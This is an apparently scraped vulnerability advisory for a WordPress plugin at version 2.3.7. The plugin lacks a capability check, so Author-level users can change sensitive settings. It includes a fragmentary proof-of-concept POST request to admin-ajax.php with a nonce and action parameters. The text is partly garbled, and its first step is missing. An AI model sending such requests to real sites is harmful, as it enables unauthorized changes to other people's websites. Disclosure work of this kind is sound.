Description The plugin does not properly ensure that a user has the necessary capabilities to edit certain sensitive plugin settings, making it possible for users with at least the Author role to edit them.
tss
2) Insert the found nonce and cookies into the request to change the plugin settings POST /wp-admin/admin-ajax.php HTTP/2 Host: example.com Cookie: Author+ Content-Length: 144 Accept: / Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=1, i slug=updatedButShouldntBe&tss;_nonce=30fd47c1fe&action;=tssSettingsActionCPE | Name | Operator | Version |
---|---|---|---|
eq | 2.3.7 |